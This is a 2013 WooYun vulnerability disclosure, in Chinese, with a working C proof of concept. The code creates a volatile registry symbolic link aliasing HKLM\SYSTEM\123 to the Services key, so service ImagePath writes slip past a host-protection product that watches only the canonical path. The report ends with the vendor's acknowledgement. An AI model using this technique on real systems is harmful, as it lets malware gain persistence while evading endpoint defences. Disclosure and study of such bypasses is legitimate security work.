2013-09-10: 细节已通知厂商并且等待厂商处理中 2013-09-10: 厂商已经确认,细节仅向厂商公开 2013-09-13: 细节向第三方安全合作伙伴开放 2013-11-04: 细节向核心白帽子及相关领域专家公开 2013-11-14: 细节向普通白帽子公开 2013-11-24: 细节向实习白帽子公开 2013-12-09: 细节向公众公开
礼物收到了,感谢。最后一次了,不研究了.
标题是迷惑人的,其实是任意写注册表。这次利用的是注册表符号链接(REG_LINK 类型的 SymbolicLinkValue 值;代码里虽然叫"硬链接",但注册表并没有硬链接,这是符号链接):POC 执行以后 HKEY_LOCAL_MACHINE\SYSTEM\123 就成了 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 的别名,操作 HKEY_LOCAL_MACHINE\SYSTEM\123\poc 就等于操作 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\poc(这个服务键是原本就存在的),而主动防御只拦截原始路径、不拦截经由 HKEY_LOCAL_MACHINE\SYSTEM\123 的写入,改一下 ImagePath 就又回到完全 bypass 的原点了。注意 POC 用的是 REG_OPTION_VOLATILE,链接键重启后自动消失;创建链接需要对 HKLM\SYSTEM 有 KEY_CREATE_LINK 权限,即管理员权限。
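/*
 * WooYun proof of concept: create a registry SYMBOLIC LINK (not a hard link,
 * despite the function name) so that
 *     \Registry\Machine\System\123
 * is an alias for
 *     \Registry\Machine\System\CurrentControlSet\Services
 * Writing System\123\<svc>\ImagePath therefore writes the real service key.
 * The report's point is that a host-protection product which filters only the
 * canonical Services path does not see writes made through the alias; this
 * code does not check that claim, it only creates the link.
 *
 * Requires <windows.h> (included earlier in the file) and ntdll.dll.
 * Works on x86 and x64: the native calls go through typed function pointers
 * instead of the original 32-bit-only __asm blocks.
 */

/* ntdll structures.  winternl.h is deliberately NOT included, so these local
 * definitions do not clash with it. */
typedef struct _LSA_UNICODE_STRING {
    USHORT Length;          /* bytes, excluding the terminator */
    USHORT MaximumLength;   /* bytes, including the terminator */
    PWSTR  Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Same shape as the ntdef.h macro: p = POBJECT_ATTRIBUTES, n = PUNICODE_STRING,
 * a = OBJ_* flags, r = root directory handle, s = security descriptor. */
#define InitializeObjectAttributes(p, n, a, r, s)           \
    do {                                                    \
        (p)->Length = sizeof(OBJECT_ATTRIBUTES);            \
        (p)->RootDirectory = (r);                           \
        (p)->Attributes = (a);                              \
        (p)->ObjectName = (n);                              \
        (p)->SecurityDescriptor = (s);                      \
        (p)->SecurityQualityOfService = NULL;               \
    } while (0)

/* Constants the original passed as bare numbers (0x40, 0x22, 3, 6). */
enum {
    POC_OBJ_CASE_INSENSITIVE   = 0x40, /* OBJ_CASE_INSENSITIVE */
    POC_KEY_SET_VALUE          = 0x02, /* KEY_SET_VALUE */
    POC_KEY_CREATE_LINK        = 0x20, /* KEY_CREATE_LINK */
    POC_REG_OPTION_VOLATILE    = 0x01, /* link key vanishes on reboot */
    POC_REG_OPTION_CREATE_LINK = 0x02, /* create the key as a symbolic link */
    POC_REG_LINK               = 6     /* value type of SymbolicLinkValue */
};

/* ntdll exports resolved at run time.  NTSTATUS is spelled LONG because
 * <windows.h> alone does not define NTSTATUS; a negative status is failure. */
typedef VOID (NTAPI *RtlInitUnicodeString_t)(PUNICODE_STRING Dest, PCWSTR Src);
typedef LONG (NTAPI *ZwCreateKey_t)(HANDLE *KeyHandle, ULONG DesiredAccess,
                                    POBJECT_ATTRIBUTES ObjectAttributes,
                                    ULONG TitleIndex, PUNICODE_STRING Class,
                                    ULONG CreateOptions, ULONG *Disposition);
typedef LONG (NTAPI *ZwSetValueKey_t)(HANDLE KeyHandle, PUNICODE_STRING ValueName,
                                      ULONG TitleIndex, ULONG Type,
                                      PVOID Data, ULONG DataSize);
typedef LONG (NTAPI *ZwClose_t)(HANDLE Handle);

/*
 * Create the volatile link key \Registry\Machine\System\123 and point it at
 * the Services key.
 *
 * Returns TRUE only when both ZwCreateKey and ZwSetValueKey succeed (the
 * original always returned FALSE and ignored both status codes).  The caller
 * needs KEY_CREATE_LINK and KEY_SET_VALUE on HKLM\SYSTEM, i.e. administrator.
 * The key handle and the ntdll module reference are released on every path;
 * the link itself stays in the registry until reboot.
 */
BOOL RegHardLink(void)
{
    /* Alias that will be created ... */
    static const WCHAR kLinkKey[] = L"\\Registry\\Machine\\System\\123";
    /* ... and the existing key it resolves to. */
    static const WCHAR kLinkTarget[] =
        L"\\Registry\\Machine\\System\\CurrentControlSet\\Services";
    static const WCHAR kLinkValueName[] = L"SymbolicLinkValue";

    BOOL bRet = FALSE;
    HMODULE hLib = NULL;
    HANDLE linkhandle = NULL;
    ZwClose_t pZwClose = NULL;

    do {
        RtlInitUnicodeString_t pRtlInitUnicodeString;
        ZwCreateKey_t pZwCreateKey;
        ZwSetValueKey_t pZwSetValueKey;
        UNICODE_STRING keyString;
        UNICODE_STRING valueString;
        OBJECT_ATTRIBUTES oba;
        ULONG disposition = 0;
        LONG status;

        /* LoadLibraryA: the name is a narrow literal, so do not depend on
         * whether the build defines UNICODE. */
        hLib = LoadLibraryA("ntdll.dll");
        if (!hLib) {
            break;
        }

        pRtlInitUnicodeString =
            (RtlInitUnicodeString_t)GetProcAddress(hLib, "RtlInitUnicodeString");
        pZwCreateKey   = (ZwCreateKey_t)GetProcAddress(hLib, "ZwCreateKey");
        pZwSetValueKey = (ZwSetValueKey_t)GetProcAddress(hLib, "ZwSetValueKey");
        pZwClose       = (ZwClose_t)GetProcAddress(hLib, "ZwClose");
        if (!pRtlInitUnicodeString || !pZwCreateKey || !pZwSetValueKey || !pZwClose) {
            break;
        }

        pRtlInitUnicodeString(&keyString, kLinkKey);
        InitializeObjectAttributes(&oba, &keyString, POC_OBJ_CASE_INSENSITIVE, NULL, NULL);

        /* REG_OPTION_CREATE_LINK makes the new key a link.  KEY_CREATE_LINK is
         * required for that and KEY_SET_VALUE for writing SymbolicLinkValue. */
        status = pZwCreateKey(&linkhandle,
                              POC_KEY_SET_VALUE | POC_KEY_CREATE_LINK,
                              &oba, 0, NULL,
                              POC_REG_OPTION_VOLATILE | POC_REG_OPTION_CREATE_LINK,
                              &disposition);
        if (status < 0) {
            linkhandle = NULL; /* not a valid handle on failure */
            break;
        }

        /* The REG_LINK data is the target path WITHOUT the terminating NUL,
         * hence wcslen() * sizeof(WCHAR) rather than sizeof(kLinkTarget). */
        pRtlInitUnicodeString(&valueString, kLinkValueName);
        status = pZwSetValueKey(linkhandle, &valueString, 0, POC_REG_LINK,
                                (PVOID)kLinkTarget,
                                (ULONG)(wcslen(kLinkTarget) * sizeof(WCHAR)));
        if (status < 0) {
            break;
        }

        bRet = TRUE;
    } while (0);

    /* Only the process-side resources are released here; the link key itself
     * persists until reboot (it was created REG_OPTION_VOLATILE). */
    if (linkhandle && pZwClose) {
        pZwClose(linkhandle);
    }
    if (hLib) {
        FreeLibrary(hLib);
    }
    return bRet;
}

int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    /* Exit status now reports whether the link was actually created. */
    return RegHardLink() ? 0 : 1;
}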
试了就知道
他们懂
危害等级:高
漏洞Rank:15
确认时间:2013-09-10 15:41
感谢对百度安全的关注,我们已经开始进行修复,欢迎继续关注百度安全。--“百度,因你更安全”
暂无